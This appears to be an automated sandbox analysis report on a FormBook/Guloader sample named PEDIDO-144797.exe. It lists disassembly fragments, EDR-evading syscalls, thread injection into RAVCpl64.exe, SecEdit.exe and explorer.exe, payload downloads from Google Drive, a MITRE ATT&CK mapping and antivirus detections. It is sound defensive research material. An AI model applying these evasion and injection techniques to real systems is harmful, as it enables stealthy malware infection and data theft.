        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D174A mov eax, dword ptr fs:[00000030h]2_2_326D174A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D3740 mov eax, dword ptr fs:[00000030h]2_2_326D3740
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F75B mov eax, dword ptr fs:[00000030h]2_2_3269F75B
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F75B mov eax, dword ptr fs:[00000030h]2_2_3269F75B
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F75B mov eax, dword ptr fs:[00000030h]2_2_3269F75B
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F75B mov eax, dword ptr fs:[00000030h]2_2_3269F75B
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F75B mov eax, dword ptr fs:[00000030h]2_2_3269F75B
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F75B mov eax, dword ptr fs:[00000030h]2_2_3269F75B
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F75B mov eax, dword ptr fs:[00000030h]2_2_3269F75B
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F75B mov eax, dword ptr fs:[00000030h]2_2_3269F75B
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F75B mov eax, dword ptr fs:[00000030h]2_2_3269F75B
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C2755 mov eax, dword ptr fs:[00000030h]2_2_326C2755
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C2755 mov eax, dword ptr fs:[00000030h]2_2_326C2755
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C2755 mov eax, dword ptr fs:[00000030h]2_2_326C2755
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C2755 mov ecx, dword ptr fs:[00000030h]2_2_326C2755
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C2755 mov eax, dword ptr fs:[00000030h]2_2_326C2755
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C2755 mov eax, dword ptr fs:[00000030h]2_2_326C2755
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DA750 mov eax, dword ptr fs:[00000030h]2_2_326DA750
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C9723 mov eax, dword ptr fs:[00000030h]2_2_326C9723
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C270D mov eax, dword ptr fs:[00000030h]2_2_326C270D
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C270D mov eax, dword ptr fs:[00000030h]2_2_326C270D
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C270D mov eax, dword ptr fs:[00000030h]2_2_326C270D
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3275F717 mov eax, dword ptr fs:[00000030h]2_2_3275F717
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AD700 mov ecx, dword ptr fs:[00000030h]2_2_326AD700
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269B705 mov eax, dword ptr fs:[00000030h]2_2_3269B705
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269B705 mov eax, dword ptr fs:[00000030h]2_2_3269B705
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269B705 mov eax, dword ptr fs:[00000030h]2_2_3269B705
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269B705 mov eax, dword ptr fs:[00000030h]2_2_3269B705
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A471B mov eax, dword ptr fs:[00000030h]2_2_326A471B
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A471B mov eax, dword ptr fs:[00000030h]2_2_326A471B
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3276970B mov eax, dword ptr fs:[00000030h]2_2_3276970B
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3276970B mov eax, dword ptr fs:[00000030h]2_2_3276970B
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CE7E0 mov eax, dword ptr fs:[00000030h]2_2_326CE7E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A37E4 mov eax, dword ptr fs:[00000030h]2_2_326A37E4
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A37E4 mov eax, dword ptr fs:[00000030h]2_2_326A37E4
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A37E4 mov eax, dword ptr fs:[00000030h]2_2_326A37E4
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A37E4 mov eax, dword ptr fs:[00000030h]2_2_326A37E4
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A37E4 mov eax, dword ptr fs:[00000030h]2_2_326A37E4
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A37E4 mov eax, dword ptr fs:[00000030h]2_2_326A37E4
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A37E4 mov eax, dword ptr fs:[00000030h]2_2_326A37E4
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A77F9 mov eax, dword ptr fs:[00000030h]2_2_326A77F9
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A77F9 mov eax, dword ptr fs:[00000030h]2_2_326A77F9
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3275F7CF mov eax, dword ptr fs:[00000030h]2_2_3275F7CF
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_327717BC mov eax, dword ptr fs:[00000030h]2_2_327717BC
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A07A7 mov eax, dword ptr fs:[00000030h]2_2_326A07A7
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3276D7A7 mov eax, dword ptr fs:[00000030h]2_2_3276D7A7
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3276D7A7 mov eax, dword ptr fs:[00000030h]2_2_3276D7A7
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3276D7A7 mov eax, dword ptr fs:[00000030h]2_2_3276D7A7
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3271E79D mov eax, dword ptr fs:[00000030h]2_2_3271E79D
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3271E79D mov eax, dword ptr fs:[00000030h]2_2_3271E79D
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3271E79D mov eax, dword ptr fs:[00000030h]2_2_3271E79D
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3271E79D mov eax, dword ptr fs:[00000030h]2_2_3271E79D
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3271E79D mov eax, dword ptr fs:[00000030h]2_2_3271E79D
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3271E79D mov eax, dword ptr fs:[00000030h]2_2_3271E79D
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3271E79D mov eax, dword ptr fs:[00000030h]2_2_3271E79D
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3271E79D mov eax, dword ptr fs:[00000030h]2_2_3271E79D
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3271E79D mov eax, dword ptr fs:[00000030h]2_2_3271E79D
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3277B781 mov eax, dword ptr fs:[00000030h]2_2_3277B781
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3277B781 mov eax, dword ptr fs:[00000030h]2_2_3277B781
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D1796 mov eax, dword ptr fs:[00000030h]2_2_326D1796
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D1796 mov eax, dword ptr fs:[00000030h]2_2_326D1796
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3275F478 mov eax, dword ptr fs:[00000030h]2_2_3275F478
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3276A464 mov eax, dword ptr fs:[00000030h]2_2_3276A464
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A8470 mov eax, dword ptr fs:[00000030h]2_2_326A8470
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A8470 mov eax, dword ptr fs:[00000030h]2_2_326A8470
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B0445 mov eax, dword ptr fs:[00000030h]2_2_326B0445
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B0445 mov eax, dword ptr fs:[00000030h]2_2_326B0445
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B0445 mov eax, dword ptr fs:[00000030h]2_2_326B0445
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B0445 mov eax, dword ptr fs:[00000030h]2_2_326B0445
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B0445 mov eax, dword ptr fs:[00000030h]2_2_326B0445
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B0445 mov eax, dword ptr fs:[00000030h]2_2_326B0445
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CE45E mov eax, dword ptr fs:[00000030h]2_2_326CE45E
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CE45E mov eax, dword ptr fs:[00000030h]2_2_326CE45E
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CE45E mov eax, dword ptr fs:[00000030h]2_2_326CE45E
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CE45E mov eax, dword ptr fs:[00000030h]2_2_326CE45E
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CE45E mov eax, dword ptr fs:[00000030h]2_2_326CE45E
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DD450 mov eax, dword ptr fs:[00000030h]2_2_326DD450
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DD450 mov eax, dword ptr fs:[00000030h]2_2_326DD450
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AD454 mov eax, dword ptr fs:[00000030h]2_2_326AD454
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AD454 mov eax, dword ptr fs:[00000030h]2_2_326AD454
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AD454 mov eax, dword ptr fs:[00000030h]2_2_326AD454
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AD454 mov eax, dword ptr fs:[00000030h]2_2_326AD454
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AD454 mov eax, dword ptr fs:[00000030h]2_2_326AD454
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AD454 mov eax, dword ptr fs:[00000030h]2_2_326AD454
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D7425 mov eax, dword ptr fs:[00000030h]2_2_326D7425
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D7425 mov ecx, dword ptr fs:[00000030h]2_2_326D7425
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269B420 mov eax, dword ptr fs:[00000030h]2_2_3269B420
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32729429 mov eax, dword ptr fs:[00000030h]2_2_32729429
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3272F42F mov eax, dword ptr fs:[00000030h]2_2_3272F42F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3272F42F mov eax, dword ptr fs:[00000030h]2_2_3272F42F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3272F42F mov eax, dword ptr fs:[00000030h]2_2_3272F42F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3272F42F mov eax, dword ptr fs:[00000030h]2_2_3272F42F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3272F42F mov eax, dword ptr fs:[00000030h]2_2_3272F42F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269640D mov eax, dword ptr fs:[00000030h]2_2_3269640D
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32736400 mov eax, dword ptr fs:[00000030h]2_2_32736400
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32736400 mov eax, dword ptr fs:[00000030h]2_2_32736400
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3275F409 mov eax, dword ptr fs:[00000030h]2_2_3275F409
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DE4EF mov eax, dword ptr fs:[00000030h]2_2_326DE4EF
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DE4EF mov eax, dword ptr fs:[00000030h]2_2_326DE4EF
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3275F4FD mov eax, dword ptr fs:[00000030h]2_2_3275F4FD
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D54E0 mov eax, dword ptr fs:[00000030h]2_2_326D54E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C94FA mov eax, dword ptr fs:[00000030h]2_2_326C94FA
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A64F0 mov eax, dword ptr fs:[00000030h]2_2_326A64F0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DA4F0 mov eax, dword ptr fs:[00000030h]2_2_326DA4F0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DA4F0 mov eax, dword ptr fs:[00000030h]2_2_326DA4F0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C14C9 mov eax, dword ptr fs:[00000030h]2_2_326C14C9
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C14C9 mov eax, dword ptr fs:[00000030h]2_2_326C14C9
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C14C9 mov eax, dword ptr fs:[00000030h]2_2_326C14C9
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C14C9 mov eax, dword ptr fs:[00000030h]2_2_326C14C9
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C14C9 mov eax, dword ptr fs:[00000030h]2_2_326C14C9
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CF4D0 mov eax, dword ptr fs:[00000030h]2_2_326CF4D0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CF4D0 mov eax, dword ptr fs:[00000030h]2_2_326CF4D0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CF4D0 mov eax, dword ptr fs:[00000030h]2_2_326CF4D0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CF4D0 mov eax, dword ptr fs:[00000030h]2_2_326CF4D0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CF4D0 mov eax, dword ptr fs:[00000030h]2_2_326CF4D0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CF4D0 mov eax, dword ptr fs:[00000030h]2_2_326CF4D0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CF4D0 mov eax, dword ptr fs:[00000030h]2_2_326CF4D0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CF4D0 mov eax, dword ptr fs:[00000030h]2_2_326CF4D0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CF4D0 mov eax, dword ptr fs:[00000030h]2_2_326CF4D0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C44D1 mov eax, dword ptr fs:[00000030h]2_2_326C44D1
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C44D1 mov eax, dword ptr fs:[00000030h]2_2_326C44D1
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D44A8 mov eax, dword ptr fs:[00000030h]2_2_326D44A8
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A24A2 mov eax, dword ptr fs:[00000030h]2_2_326A24A2
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A24A2 mov ecx, dword ptr fs:[00000030h]2_2_326A24A2
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DE4BC mov eax, dword ptr fs:[00000030h]2_2_326DE4BC
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3272D4A0 mov ecx, dword ptr fs:[00000030h]2_2_3272D4A0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3272D4A0 mov eax, dword ptr fs:[00000030h]2_2_3272D4A0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3272D4A0 mov eax, dword ptr fs:[00000030h]2_2_3272D4A0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3272C490 mov eax, dword ptr fs:[00000030h]2_2_3272C490

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x50C994EJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeNtSuspendThread: Indirect: 0x323B3909Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x7FFFAFCA2651Jump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeNtSetContextThread: Indirect: 0x323B35E9Jump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeNtQueueApcThread: Indirect: 0x323AF414Jump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeNtResumeThread: Indirect: 0x323B3C29Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtResumeThread: Direct from: 0x50C9B80Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x50D1679Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x50C9B0FJump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x7FFF7B7E9E7F
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeSection loaded: NULL target: C:\Windows\SysWOW64\SecEdit.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeThread register set: target process: 6740Jump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exeThread register set: target process: 6740Jump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeProcess created: C:\Users\user\Desktop\PEDIDO-144797.exe "C:\Users\user\Desktop\PEDIDO-144797.exe"Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\SysWOW64\SecEdit.exe"Jump to behavior
        Source: RAVCpl64.exe, 00000003.00000002.94441142672.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.90017357141.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.91558363278.00000000015D0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
        Source: RAVCpl64.exe, 00000003.00000002.94441142672.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.90017357141.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.91560293490.0000000004AD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: RAVCpl64.exe, 00000003.00000002.94441142672.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.90017357141.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.91558363278.00000000015D0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: explorer.exe, 00000005.00000002.94439556197.0000000000E79000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91557489428.0000000000E79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
        Source: RAVCpl64.exe, 00000003.00000002.94441142672.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.90017357141.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.91558363278.00000000015D0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 0_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403489

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000002.00000002.90098184931.00000000323D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.91632908078.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.91633128931.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000002.00000002.90098184931.00000000323D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.91632908078.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.91633128931.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API        		1
        DLL Side-Loading        		1
        Access Token Manipulation        		1
        Masquerading        		OS Credential Dumping121
        Security Software Discovery        		Remote Services1
        Archive Collected Data        		11
        Encrypted Channel        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts312
        Process Injection        		2
        Virtualization/Sandbox Evasion        		LSASS Memory2
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol1
        Clipboard Data        		1
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Abuse Elevation Control Mechanism        		1
        Access Token Manipulation        		Security Account Manager2
        Process Discovery        		SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        DLL Side-Loading        		312
        Process Injection        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput Capture13
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information        		LSA Secrets3
        File and Directory Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Abuse Elevation Control Mechanism        		Cached Domain Credentials13
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
        Obfuscated Files or Information        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1525501 Sample: PEDIDO-144797.exe Startdate: 04/10/2024 Architecture: WINDOWS Score: 100 28 drive.usercontent.google.com 2->28 30 drive.google.com 2->30 38 Malicious sample detected (through community Yara rule) 2->38 40 Antivirus / Scanner detection for submitted sample 2->40 42 Multi AV Scanner detection for submitted file 2->42 44 2 other signatures 2->44 10 PEDIDO-144797.exe 1 33 2->10         started        signatures3 process4 file5 26 C:\Users\user\AppData\Local\...\System.dll, PE32 10->26 dropped 52 Switches to a custom stack to bypass stack traces 10->52 14 PEDIDO-144797.exe 6 10->14         started        signatures6 process7 dnsIp8 32 drive.usercontent.google.com 142.250.80.97, 443, 49733 GOOGLEUS United States 14->32 34 drive.google.com 142.251.40.206, 443, 49732 GOOGLEUS United States 14->34 54 Modifies the context of a thread in another process (thread injection) 14->54 56 Maps a DLL or memory area into another process 14->56 58 Queues an APC in another process (thread injection) 14->58 60 Found direct / indirect Syscall (likely to bypass EDR) 14->60 18 RAVCpl64.exe 14->18 injected signatures9 process10 signatures11 36 Found direct / indirect Syscall (likely to bypass EDR) 18->36 21 SecEdit.exe 18->21         started        process12 signatures13 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Switches to a custom stack to bypass stack traces 21->50 24 explorer.exe 54 1 21->24 injected process14

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        PEDIDO-144797.exe100%AviraHEUR/AGEN.1331786
        PEDIDO-144797.exe34%ReversingLabsWin32.Trojan.Guloader
        PEDIDO-144797.exe39%VirustotalBrowse

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp\System.dll0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        drive.google.com0%VirustotalBrowse
        drive.usercontent.google.com1%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        https://api.msn.com/v1/news/Feed/Windows?0%VirustotalBrowse
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gowI0%VirustotalBrowse
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyvW0%VirustotalBrowse
